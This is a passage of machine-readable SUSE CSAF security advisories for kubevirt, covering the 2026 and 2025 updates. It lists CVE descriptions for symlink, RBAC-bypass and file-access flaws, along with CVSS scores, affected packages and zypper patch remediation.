"text": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64437",
"url": "https://www.suse.com/security/cve/CVE-2025-64437"
},
{
"category": "external",
"summary": "SUSE Bug 1253194 for CVE-2025-64437",
"url": "https://bugzilla.suse.com/1253194"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.9,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "low"
}
],
"title": "CVE-2025-64437"
}
]
}
SUSE-SU-2026:20551-1
Vulnerability from csaf_suse - Published: 2026-02-27 08:49 - Updated: 2026-02-27 08:49Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for kubevirt",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for kubevirt fixes the following issues:\n\nUpdate to version 1.7.0 (bsc#1257128).\n\nSecurity issues fixed:\n\n - CVE-2025-64435: logic flaw in the virt-controller can lead to incorrect status updates and potentially causing a DoS\n (bsc#1253189).\n - CVE-2024-45310: kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into\n creating empty files/directories on host (bsc#1257422).\n - CVE-2025-22872: incorrectly interpreted tags can cause content to be placed wrong scope during DOM construction\n (bsc#1241772).\n - CVE-2025-64432: fail to correctly validate certain fields in the client TLS certificate may allow an attacker to\n bypass existing RBAC controls (bsc#1253181).\n - CVE-2025-64433: improper symlink handling can allow to read arbitrary files (bsc#1253185).\n - CVE-2025-64434: compromising virt-handler instance can lead to impersonate virt-api and execute privileged operations\n (bsc#1253186).\n - CVE-2025-64437: mishandling of symlinks can lead to compromising the CIA (bsc#1253194).\n - CVE-2025-64324: a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users\n (bsc#1253748).\n\nOther updates and bugfixes:\n\n - Upstream now uses stateless firmware for CoCo VMs.\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SL-Micro-6.2-319",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20551-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20551-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620551-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20551-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2026-March/044565.html"
},
{
"category": "self",
"summary": "SUSE Bug 1241772",
"url": "https://bugzilla.suse.com/1241772"
},
{
"category": "self",
"summary": "SUSE Bug 1253181",
"url": "https://bugzilla.suse.com/1253181"
},
{
"category": "self",
"summary": "SUSE Bug 1253185",
"url": "https://bugzilla.suse.com/1253185"
},
{
"category": "self",
"summary": "SUSE Bug 1253186",
"url": "https://bugzilla.suse.com/1253186"
},
{
"category": "self",
"summary": "SUSE Bug 1253189",
"url": "https://bugzilla.suse.com/1253189"
},
{
"category": "self",
"summary": "SUSE Bug 1253194",
"url": "https://bugzilla.suse.com/1253194"
},
{
"category": "self",
"summary": "SUSE Bug 1253748",
"url": "https://bugzilla.suse.com/1253748"
},
{
"category": "self",
"summary": "SUSE Bug 1257128",
"url": "https://bugzilla.suse.com/1257128"
},
{
"category": "self",
"summary": "SUSE Bug 1257422",
"url": "https://bugzilla.suse.com/1257422"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-45310 page",
"url": "https://www.suse.com/security/cve/CVE-2024-45310/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22872 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22872/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64324 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64432 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64432/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64433 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64434 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64434/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64435 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64435/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64437/"
}
],
"title": "Security update for kubevirt",
"tracking": {
"current_release_date": "2026-02-27T08:49:48Z",
"generator": {
"date": "2026-02-27T08:49:48Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20551-1",
"initial_release_date": "2026-02-27T08:49:48Z",
"revision_history": [
{
"date": "2026-02-27T08:49:48Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-manifests-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Micro 6.2",
"product": {
"name": "SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:transactional"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64 as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-45310",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-45310"
}
],
"notes": [
{
"category": "general",
"text": "runc is a CLI tool for spawning and running containers according to the OCI specification. runc 1.1.13 and earlier, as well as 1.2.0-rc2 and earlier, can be tricked into creating empty files or directories in arbitrary locations in the host filesystem by sharing a volume between two containers and exploiting a race with `os.MkdirAll`. While this could be used to create empty files, existing files would not be truncated. An attacker must have the ability to start containers using some kind of custom volume configuration. Containers using user namespaces are still affected, but the scope of places an attacker can create inodes can be significantly reduced. Sufficiently strict LSM policies (SELinux/Apparmor) can also in principle block this attack -- we suspect the industry standard SELinux policy may restrict this attack\u0027s scope but the exact scope of protection hasn\u0027t been analysed. This is exploitable using runc directly as well as through Docker and Kubernetes. The issue is fixed in runc v1.1.14 and v1.2.0-rc3.\n\nSome workarounds are available. Using user namespaces restricts this attack fairly significantly such that the attacker can only create inodes in directories that the remapped root user/group has write access to. Unless the root user is remapped to an actual\nuser on the host (such as with rootless containers that don\u0027t use `/etc/sub[ug]id`), this in practice means that an attacker would only be able to create inodes in world-writable directories. A strict enough SELinux or AppArmor policy could in principle also restrict the scope if a specific label is applied to the runc runtime, though neither the extent to which the standard existing policies block this attack nor what exact policies are needed to sufficiently restrict this attack have been thoroughly tested.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-45310",
"url": "https://www.suse.com/security/cve/CVE-2024-45310"
},
{
"category": "external",
"summary": "SUSE Bug 1230092 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1230092"
},
{
"category": "external",
"summary": "SUSE Bug 1257413 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1257413"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "low"
}
],
"title": "CVE-2024-45310"
},
{
"cve": "CVE-2025-22872",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22872"
}
],
"notes": [
{
"category": "general",
"text": "The tokenizer incorrectly interprets tags with unquoted attribute values that end with a solidus character (/) as self-closing. When directly using Tokenizer, this can result in such tags incorrectly being marked as self-closing, and when using the Parse functions, this can result in content following such tags as being placed in the wrong scope during DOM construction, but only when tags are in foreign content (e.g. \u003cmath\u003e, \u003csvg\u003e, etc contexts).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22872",
"url": "https://www.suse.com/security/cve/CVE-2025-22872"
},
{
"category": "external",
"summary": "SUSE Bug 1241710 for CVE-2025-22872",
"url": "https://bugzilla.suse.com/1241710"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-22872"
},
{
"cve": "CVE-2025-64324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64324"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to version 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn\u0027t exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64324",
"url": "https://www.suse.com/security/cve/CVE-2025-64324"
},
{
"category": "external",
"summary": "SUSE Bug 1253748 for CVE-2025-64324",
"url": "https://bugzilla.suse.com/1253748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "important"
}
],
"title": "CVE-2025-64324"
},
{
"cve": "CVE-2025-64432",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64432"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64432",
"url": "https://www.suse.com/security/cve/CVE-2025-64432"
},
{
"category": "external",
"summary": "SUSE Bug 1253181 for CVE-2025-64432",
"url": "https://bugzilla.suse.com/1253181"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64432"
},
{
"cve": "CVE-2025-64433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64433"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64433",
"url": "https://www.suse.com/security/cve/CVE-2025-64433"
},
{
"category": "external",
"summary": "SUSE Bug 1253185 for CVE-2025-64433",
"url": "https://bugzilla.suse.com/1253185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64434",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64434"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64434",
"url": "https://www.suse.com/security/cve/CVE-2025-64434"
},
{
"category": "external",
"summary": "SUSE Bug 1253186 for CVE-2025-64434",
"url": "https://bugzilla.suse.com/1253186"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64434"
},
{
"cve": "CVE-2025-64435",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64435"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64435",
"url": "https://www.suse.com/security/cve/CVE-2025-64435"
},
{
"category": "external",
"summary": "SUSE Bug 1253189 for CVE-2025-64435",
"url": "https://bugzilla.suse.com/1253189"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64435"
},
{
"cve": "CVE-2025-64437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64437"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher), thus compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64437",
"url": "https://www.suse.com/security/cve/CVE-2025-64437"
},
{
"category": "external",
"summary": "SUSE Bug 1253194 for CVE-2025-64437",
"url": "https://bugzilla.suse.com/1253194"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.9,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"SUSE Linux Micro 6.2:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "low"
}
],
"title": "CVE-2025-64437"
}
]
}
SUSE-SU-2025:4330-1
Vulnerability from csaf_suse - Published: 2025-12-09 11:33 - Updated: 2025-12-09 11:33
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container fixes the following issues:\n\nUpdated kubevirt to version 1.6.3:\n\n - CVE-2025-22872: Fixed incorrect interpretation of tags leading to content being placed in the wrong scope during DOM \n construction in golang.org/x/net/html (bsc#1241772)\n - CVE-2025-64432: Fixed bypass of RBAC controls due to incorrect validation of certain fields in the client\n TLS certificate (bsc#1253181)\n - CVE-2025-64433: Fixed arbitrary file read via improper symlink handling (bsc#1253185)\n - CVE-2025-64434: Fixed privilege escalation via virt-api impersonation from a compromised virt-handler\n instance (bsc#1253186)\n - CVE-2025-64437: Fixed mishandling of symlinks (bsc#1253194)\n - CVE-2025-64324: Fixed a logic bug that allows an attacker to read and write arbitrary files owned by more\n privileged users (bsc#1253748)\n\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-4330,SUSE-SLE-Module-Containers-15-SP7-2025-4330",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_4330-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:4330-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-20254330-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:4330-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2025-December/023449.html"
},
{
"category": "self",
"summary": "SUSE Bug 1241772",
"url": "https://bugzilla.suse.com/1241772"
},
{
"category": "self",
"summary": "SUSE Bug 1250683",
"url": "https://bugzilla.suse.com/1250683"
},
{
"category": "self",
"summary": "SUSE Bug 1253181",
"url": "https://bugzilla.suse.com/1253181"
},
{
"category": "self",
"summary": "SUSE Bug 1253185",
"url": "https://bugzilla.suse.com/1253185"
},
{
"category": "self",
"summary": "SUSE Bug 1253186",
"url": "https://bugzilla.suse.com/1253186"
},
{
"category": "self",
"summary": "SUSE Bug 1253194",
"url": "https://bugzilla.suse.com/1253194"
},
{
"category": "self",
"summary": "SUSE Bug 1253384",
"url": "https://bugzilla.suse.com/1253384"
},
{
"category": "self",
"summary": "SUSE Bug 1253748",
"url": "https://bugzilla.suse.com/1253748"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22872 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22872/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64324 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64432 page",
